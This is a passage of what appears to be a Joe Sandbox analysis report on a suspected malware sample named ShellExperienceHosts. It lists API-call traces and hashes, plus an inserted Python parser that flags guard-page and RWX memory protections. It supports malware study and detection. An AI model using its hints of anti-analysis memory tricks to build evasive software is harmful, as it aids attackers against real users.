                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 56b3b8cdbc70d8e59eb8940437c4e2478c943a09910a5fc5ea7371adba1dbad3
                                                                            • Instruction ID: d2bf510fce0e6b8da7114982632213fbbd840b5ae0ae9d03bdb54eebc07b79ec
                                                                            • Opcode Fuzzy Hash: 56b3b8cdbc70d8e59eb8940437c4e2478c943a09910a5fc5ea7371adba1dbad3
                                                                            • Instruction Fuzzy Hash: 1821D4317012246BDB204E298C88A7B77ACEF46759B158439FC51EB380E7B5E827C7A5
                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,00000000), ref: 6C85CF35
                                                                            • GetSystemInfo.KERNEL32(?,?,?,00000000), ref: 6C85CF49
                                                                            • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,00000000), ref: 6C85CF9A
                                                                            • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,00000000), ref: 6C85CFAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                            • String ID:
                                                                            • API String ID: 3562403962-0
                                                                            • Opcode ID: ce21a8025fb000440c8aff6552c5d6e7718035bb71f96cbd97fd94f43be4802e
                                                                            • Instruction ID: d9ebdca38d2a059dbcc80046eb223c534b5c79d67242dda22c66cc1f5abd2bb9
                                                                            • Opcode Fuzzy Hash: ce21a8025fb000440c8aff6552c5d6e7718035bb71f96cbd97fd94f43be4802e
                                                                            • Instruction Fuzzy Hash: 0621C772F00219ABDF30DFA5CD88ADEBBB8EB49748F400925E915E7241D7B49904CB91
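The entry above is the one place in this listing where the argument values matter more than the API names: the VirtualAlloc at 6C85CF9A commits memory as PAGE_READWRITE (00000004), and the VirtualProtect at 6C85CFAF then changes it to 00000104, which is PAGE_GUARD (0x100) combined with PAGE_READWRITE (0x04). A guard page raises STATUS_GUARD_PAGE_VIOLATION on first touch, which is how the function can notice a tracer, dumper or hook reading its memory. Reading those flags by hand across a long report is error-prone, so the following is an added example (not part of the Joe Sandbox report or the IDA plugin output) of a small parser for this report's "APIs" line format that decodes the protection argument of VirtualAlloc*/VirtualProtect* calls and flags PAGE_GUARD and PAGE_EXECUTE_READWRITE. It indexes the protection argument by its position in the documented Win32 prototype, because the report prints additional stack slots after the real arguments, and it treats "?" as an unresolved value. The sample input reuses lines from this page plus one constructed VirtualAlloc line (ref 00401000, not from the report) to exercise the RWX check.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Union

Arg = Union[int, str, None]

# Memory-protection constants from <winnt.h> (documented Win32 values).
PAGE_FLAGS: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
PAGE_GUARD, PAGE_EXECUTE_READWRITE = 0x100, 0x40

# Position of the protection argument in each API's documented prototype.
# The report lists extra stack slots after the real arguments, so index by
# prototype position rather than by argument count.
PROTECT_ARG_INDEX = {
    "VirtualAlloc": 3, "VirtualAllocEx": 4,
    "VirtualProtect": 2, "VirtualProtectEx": 3,
}

# One "APIs" entry: optional bullet, optional "Part of subcall function X:" prefix,
# Api.MODULE, optional "(args)", then "ref: ADDRESS".
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:~]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample. The four Virtual*/GetSystemInfo lines are copied from this
# report's entry above, the closesocket line from its socket-teardown entry; the
# line with ref 00401000 is constructed here to exercise the RWX check.
SAMPLE = """\
• VirtualQuery.KERNEL32(?,?,0000001C,?,?,00000000), ref: 6C85CF35
• GetSystemInfo.KERNEL32(?,?,?,00000000), ref: 6C85CF49
• VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,00000000), ref: 6C85CF9A
• VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,00000000), ref: 6C85CFAF
• VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000040), ref: 00401000
  • Part of subcall function 02233F37: closesocket.WS2_32(?), ref: 02233FFC
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None            # value not resolved by the static analysis
    try:
        return int(tok, 16)    # hex, including negatives such as -00000001
    except ValueError:
        return tok             # symbolic operand such as Function_001C6030


def parse_block(text: str) -> List[ApiCall]:
    """Parse the lines of one 'APIs' entry; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_protect(value: int) -> List[str]:
    """Expand a flProtect/flNewProtect value into its PAGE_* names."""
    names = [name for bit, name in PAGE_FLAGS.items() if value & bit]
    leftover = value & ~sum(PAGE_FLAGS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def find_memory_findings(calls: List[ApiCall]) -> List[str]:
    """Flag guard-page and RWX protections in VirtualAlloc*/VirtualProtect* calls."""
    findings: List[str] = []
    for c in calls:
        idx = PROTECT_ARG_INDEX.get(c.api)
        if idx is None or idx >= len(c.args) or not isinstance(c.args[idx], int):
            continue           # unknown API, or protection argument unresolved ('?')
        prot = c.args[idx]
        flags = "|".join(decode_protect(prot))
        if prot & PAGE_GUARD:
            findings.append(f"{c.api} @ {c.ref:08X}: guard page ({flags})")
        if prot & PAGE_EXECUTE_READWRITE:
            findings.append(f"{c.api} @ {c.ref:08X}: RWX memory ({flags})")
    return findings


if __name__ == "__main__":
    for finding in find_memory_findings(parse_block(SAMPLE)):
        print(finding)
```

Run against the sample it reports the guard page at 6C85CFAF and the constructed RWX allocation, and nothing for the PAGE_READWRITE commit at 6C85CF9A. The same LINE_RE accepts the no-argument form (such as the WideCharToMultiByte line at 6C6CC97B) and the indented "Part of subcall function" form, so the parser can be pointed at any "APIs" entry on this page; only the protection decoding is specific to the Virtual* family.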
                                                                            APIs
                                                                              • Part of subcall function 6C70EEC7: KillTimer.USER32(?,?,?,00000000,00000000,?,?,?,6C70EE14,?,00000000,00000000,00000000,?,00000000,00000000), ref: 6C70EEF2
                                                                            • GetIconInfo.USER32(00000000,?), ref: 6C70EE38
                                                                            • GetObjectW.GDI32(0000007C,00000018,?), ref: 6C70EE47
                                                                            • DeleteObject.GDI32(0000007C), ref: 6C70EE50
                                                                            • DeleteObject.GDI32(?), ref: 6C70EE59
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Delete$IconInfoKillTimer
                                                                            • String ID:
                                                                            • API String ID: 3402499453-0
                                                                            • Opcode ID: 7ad5a3f1fa9f9d3d48187510b5903138ad3265d65d8913b7fd71084615be2e81
                                                                            • Instruction ID: 31c3eef6a44a7586b14d457bf126cd01633de7ad89f40dad0ee434b91deeb40d
                                                                            • Opcode Fuzzy Hash: 7ad5a3f1fa9f9d3d48187510b5903138ad3265d65d8913b7fd71084615be2e81
                                                                            • Instruction Fuzzy Hash: 8D2171B160120DABDF219F60CE48FAE7BF9FF48714F104129F95196A90CB30E945DB94
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C746D10
                                                                              • Part of subcall function 6C7513D1: __EH_prolog3.LIBCMT ref: 6C7513D8
                                                                              • Part of subcall function 6C7513D1: SetRectEmpty.USER32(?), ref: 6C7515CE
                                                                              • Part of subcall function 6C7E7A0F: __EH_prolog3.LIBCMT ref: 6C7E7A16
                                                                            • SetRectEmpty.USER32(?), ref: 6C746DBC
                                                                            • SetRectEmpty.USER32(?), ref: 6C746DC3
                                                                            • SetRectEmpty.USER32 ref: 6C746E1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 3752103406-0
                                                                            • Opcode ID: 3952d0244c6c2cf551c847a4437c1a5be43bca7e3f3e63a85a5729ac7b80ddd3
                                                                            • Instruction ID: 97638f70e8a6a6227af63eacec5908401e60a555594ba0c243c2d7b69485a6e7
                                                                            • Opcode Fuzzy Hash: 3952d0244c6c2cf551c847a4437c1a5be43bca7e3f3e63a85a5729ac7b80ddd3
                                                                            • Instruction Fuzzy Hash: AA31FFB19056508FCB15CF28C5886C9BBB4BF08704F5885BEE89D9F346CBB45608CFA5
                                                                            APIs
                                                                            • DestroyMenu.USER32(?,05BCD017,?,?,?,Function_001C6030,000000FF), ref: 6C700FC6
                                                                            • IsWindow.USER32(?), ref: 6C700FD7
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C700FEB
                                                                            • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C701048
                                                                              • Part of subcall function 6C7D99C2: GetParent.USER32(00000000), ref: 6C7D9A49
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ContextExternal$BaseBase::~Concurrency::details::DestroyMenuMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3377428259-0
                                                                            • Opcode ID: 5de5bf2e61c5fe6c0c5eb956821a021e8a8258329e807b74f14e6d7138c83e06
                                                                            • Instruction ID: 639e151f49366c4ecaccd1e297963e80d0ae5b1e4f5398d1839b60fe2a944812
                                                                            • Opcode Fuzzy Hash: 5de5bf2e61c5fe6c0c5eb956821a021e8a8258329e807b74f14e6d7138c83e06
                                                                            • Instruction Fuzzy Hash: 0F21CC70205B419BD725DF34CA94AEAB7F8FF46358F10082DE46A93B80DB34B44ACB44
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F), ref: 022343C3
                                                                              • Part of subcall function 02231377: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 022313A2
                                                                              • Part of subcall function 02234C27: HeapFree.KERNEL32(?,00000000,?,00000000,02234E0C,?,0223429F,02234E0C,00000000,?,00000001,02234E0C,?), ref: 02234C4E
                                                                            • SetLastError.KERNEL32(00000000,?), ref: 022343AE
                                                                            • SetLastError.KERNEL32(00000057), ref: 022343D8
                                                                            • WSAGetLastError.WS2_32(?), ref: 022343E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$Heap$AllocateFree
                                                                            • String ID:
                                                                            • API String ID: 2037364846-0
                                                                            • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction ID: 316e0732f1e463aa855edf3ba91bb206ff858e5be85af68018ec01e44d3e9d63
                                                                            • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction Fuzzy Hash: 6B11E772A1512897C711FFE9A8845EEB7A4EF89322B1441A7ED0CDB204D735C9108AD0
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F), ref: 100043EC
                                                                              • Part of subcall function 100013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 100013CB
                                                                              • Part of subcall function 10004C50: HeapFree.KERNEL32(?,00000000,?,00000000,10004E35,?,100042C8,10004E35,00000000,?,00000001,10004E35,?), ref: 10004C77
                                                                            • SetLastError.KERNEL32(00000000,?), ref: 100043D7
                                                                            • SetLastError.KERNEL32(00000057), ref: 10004401
                                                                            • WSAGetLastError.WS2_32(?), ref: 10004410
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$Heap$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 1906775185-0
                                                                            • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction ID: af902972c3ae3a33560ac4961c645c5895ff77c926fb996934c7b8e77325769a
                                                                            • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction Fuzzy Hash: CA11CA76B055289BE700DFA9E8845DEB7A8EF883B2B0541B6FD0CD7204DA35DD0546D4
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0223E5BC
                                                                              • Part of subcall function 02236E5A: __FF_MSGBANNER.LIBCMT ref: 02236E73
                                                                              • Part of subcall function 02236E5A: __NMSG_WRITE.LIBCMT ref: 02236E7A
                                                                              • Part of subcall function 02236E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02236E9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_malloc
                                                                            • String ID:
                                                                            • API String ID: 501242067-0
                                                                            • Opcode ID: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                            • Instruction ID: cd0a70cec79a7d76f2ebdc0fe7a10d956758eab1c63609f6d159bb46790620c9
                                                                            • Opcode Fuzzy Hash: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                            • Instruction Fuzzy Hash: B411E7F3430712AADF232FF4980475E3B9AAF84371F128025F9098A158DF71C844CE95
                                                                            APIs
                                                                            • GetCursorPos.USER32(00000000), ref: 6C75A996
                                                                              • Part of subcall function 6C7585C2: GetWindowRect.USER32(?,?), ref: 6C7585D6
                                                                              • Part of subcall function 6C7585C2: GetParent.USER32(?), ref: 6C75862C
                                                                              • Part of subcall function 6C7585C2: GetParent.USER32(?), ref: 6C75863F
                                                                            • ScreenToClient.USER32(?,?), ref: 6C75A9C0
                                                                            • SetCapture.USER32(?), ref: 6C75A9EA
                                                                            • GetWindowRect.USER32(?,?), ref: 6C75AA2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ParentRectWindow$CaptureClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 3234571238-0
                                                                            • Opcode ID: f529d5b77e749bc4ebed7fa497b1ba43aff85eee2b0b288e3207d2907aa0a3d2
                                                                            • Instruction ID: 41bc286f60e0d930300c39b0d4d6df5ea9d45e0688ac4d896468c3f2848a9741
                                                                            • Opcode Fuzzy Hash: f529d5b77e749bc4ebed7fa497b1ba43aff85eee2b0b288e3207d2907aa0a3d2
                                                                            • Instruction Fuzzy Hash: 3621BBB0A00209EFDB05CB64C888BEDBBB9FF89319F1002A9E40597240DF75A955CBA0
                                                                            APIs
                                                                            • WSAEventSelect.WS2_32(02233A92,00000001,00000023), ref: 02233BD9
                                                                            • WSAGetLastError.WS2_32 ref: 02233BE4
                                                                            • send.WS2_32(00000001,00000000,00000000,00000000), ref: 02233C2F
                                                                            • WSAGetLastError.WS2_32 ref: 02233C3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EventSelectsend
                                                                            • String ID:
                                                                            • API String ID: 259408233-0
                                                                            • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction ID: 6509acb1c8bacf536d502138de03fc65f994bfc9a7f04f4525f9dc383dc3dd4a
                                                                            • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction Fuzzy Hash: 9811A0B1210710ABD321DFB9CCC8A47B6F9FB88725F004A2DE956C7A94C736E840CB50
                                                                            APIs
                                                                            • WSAEventSelect.WS2_32(10003ABB,00000001,00000023), ref: 10003C02
                                                                            • WSAGetLastError.WS2_32 ref: 10003C0D
                                                                            • send.WS2_32(00000001,00000000,00000000,00000000), ref: 10003C58
                                                                            • WSAGetLastError.WS2_32 ref: 10003C63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EventSelectsend
                                                                            • String ID:
                                                                            • API String ID: 259408233-0
                                                                            • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction ID: 2cb4a202ed201c3bbb9feb76d4ba786ae7603a0bc4fad51836a507335b835d1f
                                                                            • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction Fuzzy Hash: 19116AB6600710ABE320CB79C8C8A47B7E9FB88750B014A2DE956C7690C732E8008B50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: ae93d8e1f55e07757358dedb40a48924b5c9eaccb3bbb51606774fe5ac62a377
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: 47116DB242428ABBCF175EC4ED11CEE3F23BF08254B098814FE1858534C73AC9B1AB81
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: d1fe79b298e8ae640e8af806342f721fa666114f9223f8de2d7d07bcd5403fae
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: D5117B7600818ABBCF12AF85CC51CEE3F32BB0C250F098414FA5858930C336C9B1AB81
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: 466f4f1e7ae25f0961f396d3557a49c78803b8d6a6677ae74fd306ec2772594f
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: 08114E3640018AFBDF129E84CC41CEE3F62FB083A4B558419FE6859439C336DAB1BB81
                                                                            APIs
                                                                            • GetMenuItemCount.USER32(00000000), ref: 6C760421
                                                                            • GetSubMenu.USER32(00000000,-00000001), ref: 6C760430
                                                                            • GetMenuItemCount.USER32(00000000), ref: 6C76043D
                                                                            • GetMenuItemID.USER32(00000000,00000000), ref: 6C760453
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
